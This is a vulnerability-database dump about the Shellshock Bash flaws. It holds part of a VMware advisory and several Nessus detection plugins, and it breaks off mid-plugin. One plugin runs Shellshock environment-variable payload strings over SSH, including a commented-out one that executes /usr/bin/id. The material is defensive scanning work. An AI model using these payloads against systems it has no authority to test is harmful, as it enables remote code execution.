and 2 below as these\r\n patches become available. \r\n\r\n Column 4 of the following tables lists the action required to\r\n remediate the vulnerability in each release, if a solution is\r\n available.\r\n\r\n Table 1 - ESXi and ESX Hypervisor\r\n =================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n ESXi any ESXi Not affected\r\n\r\n ESX 4.1 ESX Patch pending *\r\n\r\n ESX 4.0 ESX Patch pending *\r\n\r\n * VMware will make VMware ESX 4.0 and 4.1 security patches available \r\n for the Bash shell vulnerability. This security patch release is an \r\n exception to the existing VMware lifecycle policy. \r\n\r\n Table 2 - Products that are shipped as a (virtual) appliance. \r\n =============================================================\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch \r\n ============== ======= ======= =============\r\n \r\n vCenter Server Appliance 5.x Linux Patch Pending\r\n Horizon DaaS Platform 6.x Linux Patch Pending\r\n Horizon Workspace 1.x, 2.x Linux Patch Pending\r\n IT Business Management Suite 1.x Linux Patch Pending\r\n NSX for Multi-Hypervisor 4.x Linux Patch Pending\r\n NSX for vSphere 6.x Linux Patch Pending\r\n NVP 3.x Linux Patch Pending\r\n vCenter Converter Standalone 5.x Linux Patch Pending \r\n vCenter Hyperic Server 5.x Linux Patch Pending\r\n vCenter Infrastructure Navigator 5.x Linux Patch Pending\r\n vCenter Log Insight 1.x, 2.x Linux 2.0 U1\r\n vCenter Operations Manager 5.x Linux Patch Pending\r\n vCenter Orchestrator Appliance 4.x, 5.x Linux Patch Pending\r\n vCenter Site Recovery Manager 5.x Linux Patch Pending\r\n**\r\n vCenter Support Assistant 5.x Linux Patch Pending\r\n vCloud Automation Center 6.x Linux Patch Pending\r\n vCloud Automation Center\r\n Application Services 6.x Linux Patch Pending\r\n vCloud Director Appliance 5.x Linux Patch Pending\r\n vCloud Connector 2.x Linux Patch Pending\r\n vCloud Networking and Security 5.x Linux Patch Pending\r\n vCloud Usage Meter 3.x Linux Patch Pending\r\n vFabric Application Director 5.x, 6.x Linux Patch Pending\r\n vFabric Postgres 9.x Linux Patch Pending\r\n Viewplanner 3.x Linux Patch Pending\r\n VMware Application Dependency \r\n Planner x.x Linux Patch Pending\r\n VMware Data Recovery 2.x Linux Patch Pending\r\n VMware HealthAnalyzer 5.x Linux Patch Pending\r\n VMware Mirage Gateway 5.x Linux Patch Pending\r\n VMware Socialcast On Premise x.x Linux Patch Pending\r\n VMware Studio 2.x Linux Patch Pending\r\n VMware TAM Data Manager x.x Linux Patch Pending\r\n VMware Workbench 3.x Linux Patch Pending\r\n vSphere App HA 1.x Linux Patch Pending\r\n vSphere Big Data Extensions 1.x, 2.x Linux Patch Pending\r\n vSphere Data Protection 5.x Linux Patch Pending\r\n vSphere Management Assistant 5.x Linux Patch Pending\r\n vSphere Replication 5.x Linux Patch Pending\r\n vSphere Storage Appliance 5.x Linux Patch Pending\r\n\r\n ** This product includes Virtual Appliances that will be updated, the\r\nproduct \r\n itself is not a Virtual Appliance.\r\n\r\n 4. Solution\r\n\r\n vCenter Log Insight\r\n ----------------------------\r\n Downloads:\r\n https://www.vmware.com/go/download-vcenter-log-insight\r\n (click Go to Downloads)\r\n Documentation:\r\n http://kb.vmware.com/kb/2091065\r\n\r\n5. References\r\n \r\n VMware Knowledge Base Article 2090740\r\n http://kb.vmware.com/kb/2090740\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 , \r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n6. Change Log\r\n\r\n 2014-09-30 VMSA-2014-0010\r\n Initial security advisory in conjunction with the release of\r\n vCenter Log Insight 2.0 U1 on 2014-09-30.\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n \r\n7. Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n security-announce at lists.vmware.com\r\n bugtraq at securityfocus.com\r\n fulldisclosure at seclists.org\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n VMware Security Response Policy\r\n https://www.vmware.com/support/policies/security_response.html\r\n\r\n VMware Lifecycle Policy\r\n https://www.vmware.com/support/policies/lifecycle.html\r\n \r\n Twitter\r\n https://twitter.com/VMwareSRC\r\n\r\n Copyright 2014 VMware Inc. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: Encryption Desktop 10.3.2 (Build 15337)\r\nCharset: utf-8\r\n\r\nwj8DBQFUK2DqDEcm8Vbi9kMRAg4rAJ9wKbbbxeD3cagCry7GGfR4fVLpDwCeMqYm\r\nSfX/140WMvqvcmkPX2chR9s=\r\n=1KVR\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-10-05T00:00:00", "published": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31131", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31131", "title": "NEW VMSA-2014-0010 - VMware product updates address critical Bash security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-06-16T00:59:43", "description": "The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.", "edition": 23, "published": "2014-10-06T00:00:00", "title": "Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6277", "CVE-2014-6278"], "modified": "2014-10-06T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_REMOTE_CODE_EXECUTION2.NASL", "href": "https://www.tenable.com/plugins/nessus/78067", "sourceData": "#TRUSTED 98518f55f12653450893ae5db7aa8af16eb1a7db51f26f8ede1919baa306d69d1b951e60d05a24ed4faffaaf9e12f60782f0db131b9cc6e0903535ab15f5094e08d2ce313ea27eed34bea8bcb49a0dc92d177f77085b697bceeb1bbbc61f46ce3a27f675213a8df035b2712f8fd0d6d6323fd8d3e4bb2672b238fff93bf19203d1e3202f94beadf090c9579fc1368ba3471a83ab9f7e9443810914acab88bd65c1aeb4f686aed228e8b5f43b388aa4731bbc6732db0e1059878310293f401bb26e08446e9259ac8a91d274164b4076a466e9cc1a61d9b8c9c7966a27b34da4f3c2da3218b48994a2e81194a267d89e8da2a3c6459b0547bdd246ffd8c601e83f9847d2d8ddbea7123929d9733099ee7ba3683d50ffaa11c6f84117446b6b7f9711a8eb7bc6675ad10734903fd55e4d9121760c47923cfa1d4f5d4bb98db7ddf9f13c7a0c6a2f44231eb7096cd13b19b06ebd65bf6412c2bb463cd294bcc7393484afcd342a72c1d08b1ee7d6e3753407ca4f91d15dec31868f36cf078395222ed9f9642908a8e8bed3256171006fb2ae87b8a0b8344e58de13a74e91e40292825870a7121fa747f02ee1baf3b04c056a3207661cfe7ce4058cc0d0b033cfa533952f020a4aef4846e0ce3363e1d7bf44f5527ec6286be58182fa757b1c6a0a64110f12230845fd925d630274b1bff59df3c0d23f99f26c3068d33cdca64a91b1\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78067);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/12\");\n\n script_cve_id(\"CVE-2014-6277\", \"CVE-2014-6278\");\n script_bugtraq_id(70165, 70166);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n\n script_name(english:\"Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock)\");\n script_summary(english:\"Logs in with SSH.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2014/Oct/9\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update Bash.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\ninclude(\"misc_func.inc\");\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction report_and_exit(port, command, output, patch_check)\n{\n local_var hdr, report;\n\n report = NULL;\n if (report_verbosity > 0)\n {\n hdr =\n '\\n' + 'Nessus was able to login via SSH and run the following command :' +\n '\\n' +\n '\\n' + command;\n\n report =\n hdr +\n '\\n' +\n '\\n' + 'and read the output :' +\n '\\n' +\n '\\n' + output +\n '\\n';\n\n if(patch_check)\n {\n report +=\n 'This indicates that the patch for CVE-2014-6277 and ' +\n '\\n' + 'CVE-2014-6278 is not installed.';\n }\n\n }\n security_hole(port:port, extra:report);\n exit(0);\n}\n\n\nif ( islocalhost() )\n{\n info_t = INFO_LOCAL;\n}\nelse\n{\n ret = ssh_open_connection();\n if ( !ret ) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n info_t = INFO_SSH;\n if(info_t == INFO_SSH) ssh_close_connection();\n}\n\nport = get_service(svc:\"ssh\", default:22, exit_on_fail:TRUE);\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\nret = ssh_open_connection();\nif ( !ret ) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n\n# Check CVE-2014-6277\n#\n# - We check CVE-2014-6277 first because this CVE covers some older\n# bash versions while CVE-2014-6278 doesn't, according to\n# http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html.\n#\n# - The CVE-2014-6277 PoC produces a segfault.\n\ncommand = 'E=\"() { x() { _; }; x() { _; } <<A; }\"' + ' bash -c E';\noutput = ssh_cmd(cmd:command, noexec:TRUE);\n\nif( \"egmentation fault\" >< output\n || \"egmentation Fault\" >< output) # Solaris\n{\n if(info_t == INFO_SSH) ssh_close_connection();\n report_and_exit(port:port, command: command, output: output);\n}\n\n# Problem reported on AIX 6.1 TL 8 SP 1 with bash 4.3.7 (redmine 10989)\n# Disable CVE-2014-6278 check for now\n\n# CVE-2014-6277 detection fails, try to detect CVE-2014-6278,\n# This CVE appears to work against bash 4.2 and 4.3.,\n# but not against 4.1 or below.\n#\n#test_command = \"echo Plugin output: $((1+1))\";\n#command = \"E='() { _; } >_[$($())] { \" + test_command + \"; }' bash -c E\";\n#output = ssh_cmd(cmd:command);\n\n#if (\"Plugin output: 2\" >< output) vuln_6278 = TRUE;\n\n# ok we detected CVE-2014-6278, send another command\n# hoping to get a more convincing output\n#if(vuln_6278)\n#{\n# test_command = \"/usr/bin/id\";\n# command2 = \"E='() { _; } >_[$($())] { \" + test_command + \"; }' bash -c E\";\n# output2 = ssh_cmd(cmd:command2);\n# if (output2 =~ \"uid=[0-9]+.*gid=[0-9]+.*\")\n# {\n# command = command2;\n# output = output2;\n# }\n# report_and_exit(port:port, command:command, output:output);\n#}\n\n# If we still cannot detect CVE-2014-6277 or CVE-2014-6278,\n# we try to determine if the patch for these CVEs has been applied.\ncommand = \"E='() { echo not patched; }' bash -c E\";\noutput = ssh_cmd(cmd:command);\nif(info_t == INFO_SSH) ssh_close_connection();\n\n# Patch not installed\n# Ignore cases where the host returns an \"unknown command\" error and returns the entire command\nif ((\"not patched\" >< output) && (\"echo not patched\" >!< output))\n report_and_exit(port:port, command:command, output:output, patch_check:TRUE);\n# Patch installed\nelse audit(AUDIT_HOST_NOT, \"affected.\");\n\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:04:11", "description": "The remote host has a version of McAfee Web Gateway (MWG) installed\nthat is affected by a command injection vulnerability in GNU Bash\nknown as Shellshock. The vulnerability is due to the processing of\ntrailing strings after function definitions in the values of\nenvironment variables. This allows a remote attacker to execute\narbitrary code via environment variable manipulation depending on the\nconfiguration of the system.", "edition": 27, "published": "2014-11-12T00:00:00", "title": "McAfee Web Gateway GNU Bash Code Injection (SB10085) (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mcafee:web_gateway"], "id": "MCAFEE_WEB_GATEWAY_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79215", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79215);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(70103, 70137, 70152, 70154, 70165, 70166);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n\n script_name(english:\"McAfee Web Gateway GNU Bash Code Injection (SB10085) (Shellshock)\");\n script_summary(english:\"Checks the version of McAfee Web Gateway.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Web Gateway (MWG) installed\nthat is affected by a command injection vulnerability in GNU Bash\nknown as Shellshock. The vulnerability is due to the processing of\ntrailing strings after function definitions in the values of\nenvironment variables. This allows a remote attacker to execute\narbitrary code via environment variable manipulation depending on the\nconfiguration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=KB83022\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the relevant patch per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:web_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_web_gateway_detect.nbin\");\n script_require_keys(\"Host/McAfee Web Gateway/Version\", \"Host/McAfee Web Gateway/Display Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"McAfee Web Gateway\";\nversion = get_kb_item_or_exit(\"Host/McAfee Web Gateway/Version\");\nversion_display = get_kb_item_or_exit(\"Host/McAfee Web Gateway/Display Version\");\n\nfix = FALSE;\n\nif (\n version =~ \"^6\\.\" ||\n version =~ \"^7\\.[0-4]\\.\"\n)\n{\n fix_display = \"7.4.2.3 Build 18233 / 7.5.0\";\n fix = \"7.4.2.3.0.18233\";\n}\n\nif (fix && ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version_display +\n '\\n Fixed version : ' + fix_display +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version_display);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T09:37:45", "description": "According to its self-reported version number, the version of Cisco\nPrime Security Manager installed on the remote host is affected by a\ncommand injection vulnerability in GNU Bash known as Shellshock. The\nvulnerability is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.", "edition": 23, "published": "2014-11-03T00:00:00", "title": "Cisco Prime Security Manager GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2014-11-03T00:00:00", "cpe": ["cpe:/a:cisco:prime_security_manager"], "id": "CISCO-SA-CSCUR01959-PRSM.NASL", "href": "https://www.tenable.com/plugins/nessus/78828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78828);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01959\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n\n script_name(english:\"Cisco Prime Security Manager GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)\");\n script_summary(english:\"Checks the PRSM version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The management application installed on the remote host is affected by\na command injection vulnerability known as Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nPrime Security Manager installed on the remote host is affected by a\ncommand injection vulnerability in GNU Bash known as Shellshock. The\nvulnerability is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cisco Prime Security Manager 9.3.2.1 (9) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_security_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prsm_web_detect.nasl\");\n script_require_keys(\"installed_sw/Cisco PRSM\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"http_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"cisco_func.inc\");\n\napp = 'Cisco PRSM';\n\nport = get_http_port(default:443, embedded:TRUE);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nbase_url = build_url(qs:install['path'], port:port);\nver = install['version'];\n\nfix = '9.3.2.1 (9)';\n\n# Versions 9.1.x, 9.2.x, and 9.3.x blow 9.3.2.1 (9) are vulnerable\nif (\n cisco_gen_ver_compare(a:ver, b:\"9.1.0\") >= 0 &&\n cisco_gen_ver_compare(a:ver, b:fix) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + base_url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, base_url, ver);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T04:04:07", "description": "The remote host has a version of McAfee Email Gateway (MEG) installed\nthat is affected by a command injection vulnerability in GNU Bash\nknown as Shellshock. The vulnerability is due to the processing of\ntrailing strings after function definitions in the values of\nenvironment variables. This allows a remote attacker to execute\narbitrary code via environment variable manipulation depending on the\nconfiguration of the system.", "edition": 27, "published": "2014-11-11T00:00:00", "title": "McAfee Email Gateway GNU Bash Code Injection (SB10085) (Shellshock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:mcafee:email_gateway"], "id": "MCAFEE_EMAIL_GATEWAY_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79123", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79123);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(70103, 70137, 70152, 70154, 70165, 70166);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n\n script_name(english:\"McAfee Email Gateway GNU Bash Code Injection (SB10085) (Shellshock)\");\n script_summary(english:\"Checks the MEG version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Email Gateway (MEG) installed\nthat is affected by a command injection vulnerability in GNU Bash\nknown as Shellshock. The vulnerability is due to the processing of\ntrailing strings after function definitions in the values of\nenvironment variables. This allows a remote attacker to execute\narbitrary code via environment variable manipulation depending on the\nconfiguration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:email_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_dependencies(\"mcafee_email_gateway_version.nbin\");\n script_require_keys(\"Host/McAfeeSMG/name\", \"Host/McAfeeSMG/version\", \"Host/McAfeeSMG/patches\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = get_kb_item_or_exit(\"Host/McAfeeSMG/name\");\nversion = get_kb_item_or_exit(\"Host/McAfeeSMG/version\");\npatches = get_kb_item_or_exit(\"Host/McAfeeSMG/patches\");\n\n# Determine fix.\nif (version =~ \"^5\\.6\\.\")\n{\n fix = \"5.6.2964.108\";\n hotfix = \"5.6h1010267\";\n}\nelse if (version =~ 